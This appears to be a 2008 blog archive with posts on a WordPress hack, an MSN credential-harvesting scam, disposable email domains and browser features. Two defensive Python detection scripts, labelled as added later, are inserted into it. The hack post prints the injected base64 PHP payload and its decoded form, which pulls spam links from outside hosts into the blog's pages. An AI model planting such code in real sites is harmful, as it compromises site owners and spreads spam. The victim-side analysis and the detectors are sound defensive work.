
Archive for the 'Internet' Category

So, I Got Hacked…

Or rather, my blog did.

You may remember there were posts floating about on the blogosphere earlier this month pertaining to an exploit in Wordpress 2.5 that individuals were using to inject malicious code into Wordpress files which would include spammy links into your page content. I just discovered that I was a victim of such an attack.

The code was placed in my theme’s header file, base64 encoded just as the article said it would be:
eval(base64_decode('ZnVuY3Rpb24gR2V0Q29udGVudCgpCnsKZXJyb3JfcmVwb3J0aW5nKDApOwokbWlycm9ycz1hcnJheSgiaHR0cDovL2xhcnJ5bWFnaWQuY29tL2xpbmtzLmh0bWwiLCAiaHR0cDovL
2xpbmstb3MuZnJlZWhvc3RpYS5jb20vbGlua3MuaHRtbCIsICJodHRwOi8vYmxvZy5ibHVlZmlyZS50di93cC1jb250ZW50L2xpbmtzLmh0bWwiKTsKZm9yZWFjaCgkbWlycm9ycyBhcyAkayA9PiAkdikKIC
AgIHsKICAgIGlmKCRjb250ZW50PWZpbGVfZ2V0X2NvbnRlbnRzKCR2KSkgYnJlYWs7CiAgICB9CmlmICgkY29udGVudD09IiIpe3JldHVybiAiPCEtLSBsaW5rcyBub3QgZm91bmQgLS0+Ijt9CnJldHVybiA
kY29udGVudDsKfQplY2hvIEdldENvbnRlbnQoKTsK'));

When decoded, the above code just so happens to be:
function GetContent()
{
error_reporting(0);
$mirrors=array("http://larrymagid.com/links.html", "http://link-os.freehostia.com/links.html", "http://blog.bluefire.tv/wp-content/links.html");
foreach($mirrors as $k => $v)
    {
    if($content=file_get_contents($v)) break;
    }
if ($content==""){return "<!-- links not found -->";}
return $content;
}
echo GetContent();

For the PHP illiterate among you readers, that code basically says to try a list of suspicious sites in turn, download the first HTML file of spammy links (Viagra, Cialis, etc.) that loads, and insert it into my blog’s pages.
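To check other theme files for the same kind of injection, the sketch below (an added example, not code from the original post) finds eval(base64_decode('...')) calls, decodes them even when the payload is wrapped across lines or nested, and reports the URLs and fetch functions inside. The sample header and the spam-a.example / spam-b.example hosts are constructed for the demonstration.

```python
import base64
import binascii
import re

# eval(base64_decode('...')) with optional whitespace; the quoted payload may
# be wrapped across several lines, as in the injected header file.
EVAL_B64 = re.compile(
    r"""eval\s*\(\s*base64_decode\s*\(\s*(['"])([A-Za-z0-9+/=\s]+)\1\s*\)\s*\)""",
    re.IGNORECASE,
)
URL = re.compile(r"""https?://[^\s"'<>)]+""", re.IGNORECASE)
REMOTE_FETCH = re.compile(r"\b(file_get_contents|fopen|curl_exec|include|require)\b")


def decode_payloads(php_source, max_depth=5):
    """Return every decoded eval(base64_decode(...)) payload, following nesting."""
    found = []
    queue = [(php_source, 0)]
    while queue:
        text, depth = queue.pop()
        if depth >= max_depth:
            continue  # stop unwrapping absurdly deep nesting
        for match in EVAL_B64.finditer(text):
            blob = re.sub(r"\s+", "", match.group(2))  # undo line wrapping
            try:
                decoded = base64.b64decode(blob, validate=True).decode("utf-8", "replace")
            except (binascii.Error, ValueError):
                continue  # not valid base64: leave the file for manual review
            found.append(decoded)
            queue.append((decoded, depth + 1))
    return found


def triage(filename, php_source):
    """Summarise one file: payload count, URLs referenced, fetch calls used."""
    payloads = decode_payloads(php_source)
    urls = sorted({u for p in payloads for u in URL.findall(p)})
    fetches = sorted({f for p in payloads for f in REMOTE_FETCH.findall(p)})
    return {"file": filename, "payloads": len(payloads), "urls": urls, "fetches": fetches}


def wrap_payload(php, width=60):
    """Build a constructed sample: base64-encode PHP and wrap it in eval()."""
    b64 = base64.b64encode(php.encode()).decode()
    lines = "\n".join(b64[i:i + width] for i in range(0, len(b64), width))
    return "eval(base64_decode('" + lines + "'));"


# Constructed sample, modelled on the decoded code above but with placeholder hosts.
INNER_PHP = (
    'function GetContent(){error_reporting(0);'
    '$mirrors=array("http://spam-a.example/links.html","http://spam-b.example/links.html");'
    'foreach($mirrors as $v){if($content=file_get_contents($v)) break;}'
    'return $content;} echo GetContent();'
)
SAMPLE_HEADER = "<?php\n" + wrap_payload(INNER_PHP) + "\n?>\n<html><head><title>My blog</title>"

if __name__ == "__main__":
    print(triage("header.php", SAMPLE_HEADER))
```

A file that reports one or more payloads deserves a manual look; themes and plugins rarely have a legitimate reason to eval base64 text.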

The issue has now been fixed, and apologies to anyone who was affected by the problem.

Carry on.

If you liked this post, buy me a coffee!

Wordpress 2.5 and IPv6 Fun

I recently upgraded this blog to Wordpress 2.5 and I’m loving it so far. The only shame was that WP Tiger Admin by Steve Smith which I had grown so used to and loved wasn’t compatible with WP2.5, so I went looking for other solutions. Then the wonderful Fluency Admin by Dean Robinson came to my rescue. Dean also makes the awesome Redoable theme which this blog makes use of.

Now, onto the second part of this post: my experiences with IPv6. I recently got an IPv6 address through a Sydney broker and have been experimenting with it since. I got my KAME dancing and I’m awaiting an rdns delegation to be able to use vhosts from afraid.org. Anybody else use IPv6?


Latest MSN scam records usernames and passwords for spam



I just received a rather strange message from a friend on my MSN contact list. Naturally I was suspicious about any messages containing a misspelled .info domain and it seems my suspicions were correct about this one.

The site in question is pooop.info. You visit that site and enter your details at your own risk, although I highly advise that you do not enter your MSN account details anywhere except the Windows Live Messenger sign-in window.

The message I received looked something like this:

PARTY PARTY PARTY

http://[your friend's email account (the part before the @)].pics.pooop.info

The message other users are receiving may vary, so be vigilant.
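The domain can change, but the lure format above puts the sender's own email name at the front of the hostname. The check below is an added example, not part of the original post: it flags instant messages whose link starts with the sender's local part, on the assumption that the pattern holds across domains. The log entries and the lure-site.example host are constructed.

```python
import re
from urllib.parse import urlsplit

URL = re.compile(r"https?://[^\s<>\"']+", re.IGNORECASE)

# Labels that are too common as a hostname prefix to mean anything on their own.
GENERIC_LABELS = {"www", "mail", "web", "blog"}


def local_part(address):
    """Return the part of an email address before the @, lowercased."""
    return address.rsplit("@", 1)[0].strip().lower()


def lure_links(sender_address, message_text):
    """Return URLs whose hostname begins with the sender's local part.

    Matches http://<local-part>.<something>.<domain>, the shape of the
    message shown above. This is a heuristic, not proof of compromise.
    """
    me = local_part(sender_address)
    if not me or me in GENERIC_LABELS:
        return []
    hits = []
    for url in URL.findall(message_text):
        try:
            host = (urlsplit(url).hostname or "").rstrip(".").lower()
        except ValueError:
            continue  # malformed URL, nothing to compare
        if host.startswith(me + "."):
            rest = host[len(me) + 1:]
            # Require at least a registrable domain after the personal prefix.
            if rest.count(".") >= 1:
                hits.append(url)
    return hits


def flag_messages(log):
    """Filter (sender, text) pairs down to those carrying a personalised link."""
    flagged = []
    for sender, text in log:
        hits = lure_links(sender, text)
        if hits:
            flagged.append((sender, hits))
    return flagged


# Constructed sample log: (sender address, message text).
SAMPLE_LOG = [
    ("jane.doe@hotmail.example", "PARTY PARTY PARTY http://jane.doe.pics.lure-site.example"),
    ("bob@hotmail.example", "lunch? menu at http://www.cafe.example/menu"),
    ("carol@hotmail.example", "my photos: http://photos.example/carol"),
]

if __name__ == "__main__":
    for sender, hits in flag_messages(SAMPLE_LOG):
        print(sender, "->", hits)
```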

So what’s the premise of this latest scam? A user voluntarily enters their MSN account details (email AND password) on the proviso that they’re going to see their friend’s photos. The site is employing the tactic of a social networking site (sign up to see your friend’s photos) and it seems to be working. What most users don’t realise is that the fine print is spelled out clearly in their terms and conditions, which are linked in plain sight above the sign-in box on the pooop.info website. Here’s the interesting part, their Terms & Conditions:

By filling out this form, you authorize TST Management, Inc to spread the word
about this 100% real and upcomming Messenger Community Site.
You will receive your share of the credit in helping us spread the word. This is a harmless
Community site which is offering users a platform to meet each other for free.

We do not share your private information with any third parties.
By using our service/website you hereby fully authorize TST Management, Inc to send messages
of a commercial nature via Instant Messages and E-Mails on behalf of third parties via the information
you provide us. This is not a “phishing” site that attempts to “trick” you into revealing personal
information. Everything we do with your information is disclosed here.
If you are under eighteen (18),
you MUST obtain permission from a parent or guardian before using our website/service.

This page is not affiliated with or operated by Microsoft(tm) or MSN Network(tm).

ANY LIABILITY, INCLUDING WITHOUT LIMITATION ANY LIABILITY FOR DAMAGES CAUSED OR
ALLEGEDLY CAUSED BY ANY FAILURE OF PERFORMANCE, ERROR, OMISSION, INTERRUPTION, DEFECT,
DELAY IN OPERATION OR TRANSMISSION, COMMUNICATIONS LINE FAILURE, SHALL BE STRICTLY LIMITED
TO THE AMOUNT PAID BY OR ON BEHALF OF THE SUBSCRIBER TO THIS SERVICE.

We may temporarily access your MSN account to do a combination
of the following:
1. Send Instant Messages to your friends promoting this site.
2. Introduce new entertaining sites to your friends via Instant Messages.

This is a free service. You will not be asked to pay at any time.
You will not be subscribed to anything asking for payment.
This service is made possible by many hours of human effort.

Messenger Profiles, Inc reserves the right to change the terms of use / privacy policy
at any time without notice. To view the latest version of this privacy policy,
simply bookmark this page for future reference.

You understand that this agreement shall prevail if there is any conflict between this
agreement and the terms of use you accepted when you signed up with MSN. You also
understand that by temporarily accessing your msn account, Messenger Profiles, Inc
is NOT agreeing to MSN’s terms of use and therefore not bound by them.

This agreement shall be construed and governed by the law of the Republic of Panama.
You expressly consent to the exclusive venue and personal
jurisdiction of the courts located in the Republic of Panama
for any actions arising from or relating to this agreement.

Copyright 2008 TST Management, Inc

I bolded the interesting part - your account may be accessed to spread the word - I believe it should say ‘your account WILL be accessed’ because that’s exactly what’s happening. You may also notice that the T&Cs are governed by the laws of Panama. I’m pretty sure I wouldn’t give my MSN login details to anyone, especially a site in Panama. But alas, here’s where it gets even more interesting. A whois of the site reveals the site is actually owned by a group in Hong Kong called Blue China Group, Ltd.

I wanted to see if the site was actually real in its claims, so I signed up for a dummy hotmail account… I entered the account details perfectly and what do you know? ‘Login failed’. Where are the photos I was promised? It seems that they’re just harvesting more and more email accounts that will most likely be used for spam. They say they’re not a phishing site, and technically they aren’t because the Terms & Conditions plainly state your account will be accessed by TST Management (there’s another discrepancy in the company’s details. What ever happened to Panama and the Blue China Group?) but I wish people would just be more careful about what they do with their information.

So spread the word to your friends not to give out their sign-in information to ANYONE, especially pooop.info. Halt the spread of this site and hopefully stop the potentially tens of thousands spam emails that will result from it.

Update: The obvious solution to this problem seems to be to change your account’s password. It seems this harvesting scam is starting to snowball, so be vigilant. Just to reiterate, don’t EVER give out your MSN account’s password. SEE UPDATE #3 BELOW

Update #2: Thanks to the comment of a reader known as ‘d’, another website, srys.info, has been uncovered which is run by the same group of shameless scammers. A whois of the domain yields the same results as the whois of pooop.info. Thanks d!

Update #3: After reading around on the internet, some say this problem is actually a virus (probably a remade version of the ‘Should I put this picture of us on MySpace?’ and then your friend would send you a .zip file). I don’t think it’s a virus at all but I will try to find out. For now, stay vigilant and remind your friends to read this article if they are affected by the problem.

Update #4 (March 26): This article has gotten quite a bit of attention around the internet, including a news story on mess.be. Just an update on the list of sites that you may be linked to include:


It seems that most of the info domains now use skaq.info as the main site and are simply just ‘mirroring’ skaq.info (it is the same site just under a different domain). Continue to be wary of such sites.

Update #5 (April 24): So here I am again updating this article because the face of the threat has changed, yet again, in an attempt to trick more users. It seems they’ve started to use more logical domains (as reported by users in the comments) such as imagehosters.info and friendpixer.com. I believe this will catch more users out, so once again I reiterate DO NOT ENTER YOUR ACCOUNT DETAILS ANYWHERE OTHER THAN YOUR MSN CLIENT. I appreciate your updates in the comments on the different sites, etc. Keep them coming! Note some comments are being pushed into the moderation queue as spam - don’t worry, I check these and get them approved as quickly as possible. There is no need to resubmit your comment.

Help to spread the word by Digging this story.


List of Disposable Email Providers

Have you ever wanted a disposable email for signing up to that shady site that you just don’t want to share your email with? A disposable email allows you to create a fake email which forwards any email sent to it to your regular inbox. (Read more at Wikipedia) The list could also be useful for adding to your ‘do not allow registrations from these addresses’ list.

Of course there are ways to bypass this deny list, but excluding the following domains from registering makes it just that little bit harder:

cosmorph.com
slopsbox.com
10minutemail.com
dodgeit.com
dontreg.com
e4ward.com
gishpuppy.com
guerrillamail.com
haltospam.com
jetable.org
kasmail.com
mailexpire.com
wuzupmail.net
willselfdestruct.com
willhackforfood.biz
temporaryinbox.com
tempinbox.com
tempemail.net
spamgourmet.com
spaml.com
spamhole.com
spamfree24.org
spamday.com
spambox.us
spambob.com
sneakemail.com
spookmail.com
hortmail.net
nospamfor.us
nobulk.com
mytrashmail.com
mintemail.com
mailnull.com
mailinator.com
maileater.com

Each provider offers their own pros and cons, so test them out for yourself and find the one that suits you best. Your thoughts on specific providers are welcomed in the comments, and if I’ve missed any out from the list, give me a heads up via comments.


DIY Myspace

Ever dreamed of being the next Myspace? Elgg’s here to help fulfill your dreams.

The last few years have seen social networks become the internet’s most popular applications, with sites such as Myspace and Facebook dominating the market. But what if you had the chance to enjoy some of this success too, but haven’t a clue where to start? That’s where Elgg comes in.

Elgg is a PHP-powered script that helps you set up a fully featured social network in your own web space. You’ll need PHP support and a spare MySQL database. While the software’s still in beta, it’s proving to be a robust and stable release.

Why roll-your-own social networking site? In short: control. You maintain absolute control over the look and feel of the whole site, decide which modules to add and which to leave out. You can even change the entire layout of the page template with just a little HTML savvy and some elbow grease.

Why join MySpace when you can be MySpace?

Edit: For those who don’t know their PHP’s from their MySQL’s and such, here’s a guide for getting you underway in the social networking scene using Elgg.


Captcha Catastrophe

They say that sex sells. Spammers just took that phrase one step further.

You’ve got to hand it to spammers. If they’re not creative, then I don’t know what they are because their latest scam is brilliant even if I do say so myself.

For those out there who don’t know what Captchas are, you’ve almost definitely completed one at some point in your travels around the internet. A captcha is a disfigured image, usually containing a word, that aims to prevent spammers from automating actions such as leaving Viagra comments on your blog or email signups.

Captchas have seen widespread success in fulfilling their purpose and the spammers have had to adjust their tactics; and that’s what they’ve done with this latest booby-trap.

But what makes this method so unique? What if I told you that you could watch an attractive woman strip and all you had to do was decipher disfigured images of words? That’s where the deception lies.

They’ve created a game with the concept that you, the user, decipher captcha images and reap the rewards of seeing a woman in ever increasing states of nudity.

So, every time you decipher a captcha you get the added flattery of nudity and the fulfillment that you’ve allowed spammers to place another comment on yet another blog, or better still, set up a free email account which will be used to send hundreds more spam emails to your inbox. Great job.


Undo For Browsers

If you’re really long in the tooth, you’ll recall when Microsoft introduced the undo command in Word for DOS. This little piece of bacon-saving magic was one of the great milestones in user-friendly software development.

It’s taken a while for browsers to catch up with the delights of undo. Of course, the need for an undo command only really became pressing once tabbed browsing appeared on the scene. Before that, you could always return to a site during a session using the Back button, or from session to session by using the browser’s history cache. But once we gained the ability to view multiple sites concurrently using tabs, the Back button was no longer sufficient. With multiple sites open, it’s all too easy to close one of those tabs and then realise you need that site open after all.

Opera, not surprisingly, was the first to bring the undo concept to the browser. It gave us the ability to undo a closed tab by pressing Ctrl-Alt-Z. Then it went further and added a multilevel undo in the form of the Trash Can. The Trash Can stores each tab you close during a session, plus every closed popup window. Click the Trash Can at the far right of the Tab Bar and you can open any of these closed items.

Firefox has had tabs all along, but no undo. Due to its support for extensions, though, third-party developers were happy to remedy that omission. A number of extensions provided basic undo functions, all the way from the single-minded Undo Close Tab to the spectacularly all-inclusive Tab Mix Plus.

The folks at Mozilla have since seen the list and in Firefox 2 you can undo a closed tab by pressing Ctrl-Shift-T. If you already used the keyboard shortcut Ctrl-T to open a new tab, that’s particularly easy to remember. If you close a series of tabs, you can reopen each of them by pressing Ctrl-Shift-T repeatedly. It’s a LIFO stack (Last In, First Out), so Firefox will open the most recently closed tab first, then the next most recently closed and so on. Firefox also includes a (less elegantly implemented) version of Opera’s Trash Can: to select from a list of closed tabs, click History —> ‘Recently Closed Tabs’.

Reopening a closed tab also restores that tab’s history, in both Opera and Firefox, so you can browse back through the sites you viewed on that tab.

So where’s the undo closed tab feature in Internet Explorer 7? It’s not there. Microsoft is still playing catch-up with its browser.

Up A Notch

Reopening a closed tab is handy, but wouldn’t it be great if you could undo a browser crash or re-display a bunch of sites after you’ve accidentally closed your browser? That’s where crash recovery comes in.

Once again, where Opera leads, the others have followed. Opera will automatically load your last session exactly as it was – all the tabs and all the windows – if you click Tools —> Preferences —> General and from the Startup menu select ‘Continue from last time’. You’ll no longer have to worry about accidentally closing a bunch of tabs.

Firefox has a similar option: go to Tools —> Options —> Main and in the ‘When Firefox starts’ box, select ‘Show my windows from last time’.

Once again, IE 7 doesn’t quite get it right. There is an option to re-display the currently open tabs, but there’s no way to set this to occur automatically. Instead, you have to remember to do it each time.

  1. Open at least two tabs.
  2. Click IE’s close button. A dialog will appear, asking whether you wish to close all tabs.
  3. Click the ‘Show Options’ button.
  4. Tick the ‘Open these the next time I use Internet Explorer’ option and then click ‘Close tabs’.

Firefox and Opera have the ability to recover from a crash. Should your computer or browser crash, the browsers will automatically offer to reload your last session. It’s not fool-proof, but it usually works.

Matching Opera

To match Opera’s graceful undo handling, Firefox and IE 7 both need the help of add-ons. For Firefox, you should install Tab Mix Plus, one of the all-time great Firefox extensions. Tab Mix Plus provides a huge array of tab options, including a right-click ‘closed tabs list’, as well as its own highly flexible crash recovery and session saver. Once installed, navigate to Tools —> ‘Tab Mix Plus Options’ —> Session to find settings to suit your needs.

For Internet Explorer, there’s IE7Pro. This add-on provides a whole bunch of enhancements for IE, including crash recovery and advanced tab management.

Tips

Tweak Firefox
If you like fiddling under your browser’s bonnet, you can manually tweak Firefox’s session restore and crash recovery settings. Type about:config in the address bar and set the Filter to session. You’ll see all of Firefox’s session-related settings. Double-click a setting to change it.

Edit: Opera users, I haven’t forgotten you! After searching around a little, I’ve found you can also change a plethora of settings using Opera’s opera6.ini. If you’d much rather edit the file from your browser, type about:config or opera:config and you’ll be greeted with a bunch of settings that you can tweak to your heart’s content! More information over at Opera Support.

Wordpress 2.3 Release Scandal: The Aftermath

After the Internet went crazy over the release of Wordpress 2.3, with Wordpress 2.4 already on the horizon, and after the scandal that came to light over claims that the new release, codenamed Dexter, was spying on its users, individuals have hit back with statements such as Matt Mullenweg’s:

As mentioned in our release announcement, the update notification sends your blog URL, plugins, and version info when it checks api.wordpress.org for new and compatible updates. It does not include $_SERVER dumps, or any settings beyond version numbers (for checking compatibility), or your blog name, or your credit card number. We do provide a way of disabling this feature; in fact I link to one of the plugins in the release announcement and in my original response to Morty’s thread.

But it’s not all bad news - some things apparently went right with Wordpress 2.3. This isn’t the first scandal to rock Wordpress. It was previously found that Wordpress ‘intentionally violated Google Adwords TOS to make money’. This article also just goes to show that sometimes even developers cross the line.

If you’re one of the many who are paranoid about sharing their information, then I suggest grabbing the 2 following plugins: Disable Wordpress version check and Disable Wordpress plugin updates. But don’t think Matt Mullenweg is the bad guy in this situation - some credit must go out to him for linking these plugins in his original posts elsewhere around the internet. If you’re simply fed up with Wordpress and this is the final straw - consider 9 Wordpress alternatives.

I didn’t write this article with the intention of flaming anybody or provoking an argument - I simply want to generate some discussion on the matter.

Your thoughts in the comments.


Wordpress 2.3 Released, Internet Goes Crazy

That’s right, Wordpress 2.3 “Dexter” has been released to the interweb. Now usually when there’s a Wordpress upgrade, everyone goes stir crazy and wants to update their blog to the latest and greatest version. But of course, riding on the back of this great news comes scandal - apparently WP 2.3 spies on its users. Slashdot has the full lowdown in the previous link, so check it out and let me know your thoughts. I won’t be upgrading in the coming days for the simple reason that Wordpress 2.3 doesn’t play nicely with many current plugins.

SEO Tip: Choose A Good Domain!

The worst mistake I’ve made with this blog was not choosing a more appropriate domain name (blame a brain impulse for that).

These should be the steps when making that decision:

  1. Select a niche or core topic for your site.
  2. Clearly define the purpose and goals of your site.
  3. Choose an appropriate domain name.

I think it’s obvious that I missed the boat on all of the steps.

When I started this blog I had no idea what I was going to write about and now that I’ve settled on some topics I’m starting to suffer for it.

Your choice of domain name can be the most important decision you make for your site and can make or break it too.

I’m #1 on Google’s search results page for “forged euphoria”. Surprisingly I’ve actually had a few hits from people looking for this. I have no idea what they expected to find.

Anyway, the reason I’m #1 for that term is because everyone links to this site with the anchor tag “Forged Euphoria”, so naturally I’m up there in the rankings. Problem is this isn’t the term I want to rank high with.

The key is choosing a domain that relates specifically to your niche and has your desired keywords in the title. For example if you were going to start a blog about cars, cars-blog.com or blog-about-cars.com would be two I’d consider using. When people link to you the majority of the time the anchor tag they’d use would be “Cars Blog” or “Blog About Cars”. Having people link to you is great, having them link with relevant keywords in the anchor tag is much much better. If your domain name contains keywords relevant to your niche you force people to link to your site with the exact keywords which will help you get a better search engine ranking.

If you’re thinking of buying a new domain first consider your niche and the purpose of your blog, before you even start throwing around ideas for names. Don’t make my mistake and get stuck trying to make the best of a bad situation.
